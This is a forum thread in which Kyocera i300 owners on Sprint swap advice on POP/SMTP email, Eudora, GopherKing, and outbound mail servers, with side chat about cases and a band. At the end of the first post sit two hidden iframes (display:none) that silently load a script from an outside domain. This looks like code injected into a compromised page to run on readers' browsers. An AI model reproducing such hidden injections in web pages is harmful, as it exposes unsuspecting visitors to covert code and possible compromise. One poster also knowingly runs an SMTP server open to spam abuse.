+ Reply to Thread

Thread: Mail Solution?

Question Mail Solution?

I am wanting to have a POP/SMTP email account that I can use on my i300 with Eudora Mail. I wouldn't want to access other accounts - just a standalone account that I could forward to from various other places and send from the pda.

Sprint doesn't seem to offer this outside of their lame Wireless web service. I don't mind paying for it if it works and there are no ads.

Any one know of such a service?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You'll be able to use most any ISP's mail services for receiving email - the trick is the sending part (for security reasons...).

We use Yahoo! WebHosting services for our corp email. Although they use username authentication for SMTP, I could not negotiate a security protocol from the i300. I gave up before completing all possible troubleshooting, and ended up using our own webserver, which is running Win2000 and using WinRoute for the smtp server.

So, you want to find someone that offers user authentication for both POP and SMTP services. Then, get some sort of guarantee that you will be able to negotiate a security protocol from your i300.

This isn't exactly what you're looking for, but it might help you in your searching...

Administrator

Arrow

i use mobile mail a la gopherking.

go to gopherking.com and take a look. 20 bucks/ year with a free trial b4 you buy. has its on pqa app and no need for eudora.

with goperking - do you connect thru sprint and use sprint mintues when you send and receive mail? I need something where I can compose offline and then send all at once - the online minutes to compose at sprint is killing me.

I set up an ISP account with ViaWest.net and this is working great so far. They give you a 15 second "send" window after checking mail. So even if you don't want to check mail, you select "Send and Check" in Eudora and it works like a charm. They also have a web mail interface for when I'm not on my phone. Unless I run into a problem over the next few days, I'm going to convert my DSL over to them, and then use one of the 3 emails addresses you get exclusively for the i300.

Unless I'm missing something, to me the big advantage to using this type of setup versus the browser setups other people mention is that in two grafitti strokes I can login, send and receive mail, and automatically log out. That way I can do all my reading and composing off-line and minimize my minutes use.

Question Outgoing Mail & Sprint

I used to be able to use airbridge.net as my outbound mail server. I did this while using my Kyocera 6035 and SprintPCS.

Eudora mail has always done fine by me... but what out bound mail server can sneak past Sprint's network authentication crap.

FYI, airbridge.net is no longer working on my Kyocera.

Also, I've read other threads on this and figured I'd give it a try. I was using ThinAir to access my corporate MS Exchange Server on my QCP 6035.

My corporate email admin uses the ThinAir server and I wondered if the other mail clients mentioned earlier will work.

"I'm gonna get myself connected"

Gotta do it again.

Stereo MC's
    You're either green and growing or ripe and rotting.

Administrator

Arrow

Stereo MC's
    do you mean the musical group? or are you just saying something else?

airbridge has not been working for spreint oflks for a while, it does work for the verizon people...

thinair gave me problems so i went to gopherking. it solves everything. you should give them a look if you havent. gopherking.com .

Sending

The main key is finding an SMTP server that will relay. If you can set up your own FreeBSD or Linux server, you can easily make this work.

Talking Getting Myself Connected

And yes, it was in reference to StereoMCs.

However, I finally scored the i300 today!

Loading the GopherKing now.

As for mail... I'm hoping to use my own inbound POP server. The bigger issue as I'm fumbling around with GK now is what SMTP to use for outbound.

I may just need more coffee.

Brooks, who and where ever you are... this place is great. Thanks for the forum and all the posts.

And one more thing and then I'll lay off. So far, ALL the cases look like a bandaid to me. The real deal still needs to be created and sold ASAP. For now, I'm using my qcp6035 holster with swivel. It ain't pretty but it's also not on back order or going to cost me $35.

:p

Bow To The Gopher King

Well... not actually. Maybe just a little. However...

Truth be told, from what I can see, I'd prefer to use Eudora Mail over GK. Eudora hooks into the palm address book kinda nicely. I really only need to pull mail from 2 accounts. SMTP, where are you?

Anybody have a clue whether or not they'll let me use there outboud server WITHOUT using the client?

Nothing against the interface and I already paid them the $24 duckets. Now I just want an outbound mail server that authenticates via Sprint PCS.

Is this really asking too much?

Biff

Administrator

Arrow

i think you cant use sprints outbound as they are hush about it.. i dont even think they have one.. i , and others, have been tyring to find sprints smtp since the early days of the 6035 (april) and no luck...

GK is cool for my MSN.. i have no problems with it...

the "Qcp6035" holster?? thats cute! you mean the plastic pager-style one? i named it the MKKral holster for the first guy on the board to purchase one.. i stil have mine also!

stereo mc's were cool.. i miss the old days...

Exclamation SMTP Ding Dang It!

I had the same problem with the 6035. That's why I used mail.airbridge.net for my outbound.

Why is this no longer working? Did Sprint make a change or did airbridge? Any ideas? GK works nicely but I'm still a fan of the Eudora integration into the Palm OS.

You'd think this would be easy to solve. Why can't someone just let us use their damn out bound server? I'll gladly pay the fee.

As for the case, I bought the 6035 leather holster from Verizon. Having read all the threads about the lousy case selection, I'm using this for now. It's a tiny bit big for the phone, but it's working nicely till I find a perfect fit.

For the rule books... I saw Stereo MCs about 8 weeks ago at the Hard Rock in Orlando. Great show!

Administrator

Arrow

I saw Stereo MCs about 8 weeks ago at the Hard Rock in Orlando. Great show!
    i envy you...

airbridge wa snever meant for sprint users to use it.. it has therefore been blocked form our use.. verizon folks can still use it...

Smile Email Solution Solution!

For Eudora to work properly, I downloaded a free SMTP server and loaded it on a machine. The URL is www.portcastserver.com. There is a known security bug that is being addressed that doesn't allow you to restrict access to the SMTP server as tightly as described in the manual.

To me it was worth the risk of possibly someone using the SMTP server to spam for the short term.

The i300 has been incredibly functional for me.

IMAP support?

OK, I am officially the IMAP king...well ok, maybe its in my own mind!

I am looking for a email app that will work wtih IMAP, for those of use with enough email to choke a horse, I don't like the thought of going back to POP3. (seems like going back to my PalmVII).

Any Ideas ???

Administrator